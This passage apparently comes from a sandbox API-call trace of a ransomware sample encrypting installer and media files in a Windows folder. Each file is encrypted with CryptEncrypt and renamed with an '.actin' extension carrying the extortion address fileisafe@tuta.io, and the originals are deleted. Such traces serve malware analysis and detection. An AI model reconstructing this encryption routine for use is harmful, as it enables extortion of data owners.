CloseHandle (hObject=0x348) returned 1 [0049.167] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 1 [0049.168] SetEvent (hEvent=0x2e8) returned 1 [0049.168] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0049.168] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.169] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=3628) returned 1 [0049.169] CloseHandle (hObject=0x348) returned 1 [0049.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 0x80 [0049.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\header.bmp.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.169] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.169] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.169] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.169] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\header.bmp.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.169] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e80) returned 1 [0049.169] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.169] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xe2c, lpOverlapped=0x0) returned 1 [0049.171] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xe30, dwBufLen=0xe30 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xe30) returned 1 [0049.171] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xe30, lpOverlapped=0x0) returned 1 [0049.172] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0049.172] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.172] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0049.172] CryptDestroyKey (hKey=0xf71b40) returned 1 [0049.172] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0049.172] CryptDestroyKey (hKey=0xf71e80) returned 1 [0049.172] CloseHandle (hObject=0x348) returned 1 [0049.172] CloseHandle (hObject=0x338) returned 1 [0049.173] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 1 [0049.173] SetEvent (hEvent=0x2e8) returned 1 [0049.174] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0049.174] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.174] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=181483595) returned 1 [0049.174] CloseHandle (hObject=0x338) returned 1 [0049.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz")) returned 0x80 [0049.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0049.174] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.174] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0049.175] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0049.175] ReadFile (in: hFile=0x338, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0049.545] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x39b12c3, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0049.545] ReadFile (in: hFile=0x338, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0049.548] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0xacd384b, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0049.548] ReadFile (in: hFile=0x338, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0049.554] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe7c | out: phKey=0x37afe7c*=0xf71fc0) returned 1 [0049.555] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.555] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc0060) returned 1 [0049.556] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0049.556] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe58 | out: lpNewFilePointer=0x0) returned 1 [0049.556] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x37afe68, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe68*=0xc0112, lpOverlapped=0x0) returned 1 [0049.569] SetEndOfFile (hFile=0x338) returned 1 [0049.569] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0xacd384b, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0049.570] WriteFile (in: hFile=0x338, lpBuffer=0x3bf014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf014a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0049.571] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x39b12c3, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0049.571] WriteFile (in: hFile=0x338, lpBuffer=0x3bf014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf014a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0049.572] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0049.572] WriteFile (in: hFile=0x338, lpBuffer=0x3bf014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf014a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0049.572] CloseHandle (hObject=0x338) returned 1 [0052.941] SetEvent (hEvent=0x2e8) returned 1 [0052.942] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0052.942] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0052.943] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=872448) returned 1 [0052.943] CloseHandle (hObject=0x2e4) returned 1 [0052.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 0x80 [0052.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0052.943] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0052.943] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0052.943] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0052.943] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0052.943] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e40) returned 1 [0052.943] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0052.943] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xd5000, lpOverlapped=0x0) returned 1 [0052.953] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xd5010, dwBufLen=0xd5010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xd5010) returned 1 [0052.954] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xd5010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xd5010, lpOverlapped=0x0) returned 1 [0052.969] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0052.969] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0052.969] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0052.969] CryptDestroyKey (hKey=0xf71b40) returned 1 [0052.969] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0052.969] CryptDestroyKey (hKey=0xf71e40) returned 1 [0052.969] CloseHandle (hObject=0x2e4) returned 1 [0052.969] CloseHandle (hObject=0x338) returned 1 [0053.419] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 1 [0053.427] SetEvent (hEvent=0x2e8) returned 1 [0053.427] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0053.427] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0053.428] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=495616) returned 1 [0053.428] CloseHandle (hObject=0x338) returned 1 [0053.428] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 0x80 [0053.428] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0053.428] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0053.428] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0053.428] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0053.428] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0053.440] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71a00) returned 1 [0053.440] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0053.440] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x79000, lpOverlapped=0x0) returned 1 [0053.898] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x79010, dwBufLen=0x79010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x79010) returned 1 [0053.898] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x79010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x79010, lpOverlapped=0x0) returned 1 [0053.906] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d40) returned 1 [0053.906] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0053.906] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0053.906] CryptDestroyKey (hKey=0xf71d40) returned 1 [0053.906] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0053.906] CryptDestroyKey (hKey=0xf71a00) returned 1 [0053.906] CloseHandle (hObject=0x338) returned 1 [0053.907] CloseHandle (hObject=0x330) returned 1 [0053.916] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 1 [0053.920] SetEvent (hEvent=0x2e8) returned 1 [0053.920] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0053.920] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0053.929] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=272046) returned 1 [0053.929] CloseHandle (hObject=0x330) returned 1 [0053.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 0x80 [0053.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0053.929] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0053.929] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0053.929] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0053.929] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0053.930] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72080) returned 1 [0053.930] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0053.930] ReadFile (in: hFile=0x330, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x426ae, lpOverlapped=0x0) returned 1 [0054.510] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x426b0, dwBufLen=0x426b0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x426b0) returned 1 [0054.511] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x426b0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x426b0, lpOverlapped=0x0) returned 1 [0054.516] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0054.516] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0054.516] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0054.517] CryptDestroyKey (hKey=0xf71b40) returned 1 [0054.517] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0054.517] CryptDestroyKey (hKey=0xf72080) returned 1 [0054.517] CloseHandle (hObject=0x330) returned 1 [0054.517] CloseHandle (hObject=0x338) returned 1 [0054.523] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 1 [0054.526] SetEvent (hEvent=0x2e8) returned 1 [0054.526] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0054.526] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0054.527] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=184832) returned 1 [0054.527] CloseHandle (hObject=0x338) returned 1 [0054.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 0x80 [0054.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0054.527] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0054.527] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0054.527] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0054.527] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0054.527] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e80) returned 1 [0054.527] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0054.527] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x2d200, lpOverlapped=0x0) returned 1 [0054.530] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x2d210, dwBufLen=0x2d210 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x2d210) returned 1 [0054.530] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x2d210, lpNumberOfBytesWritten=0x37afe70, 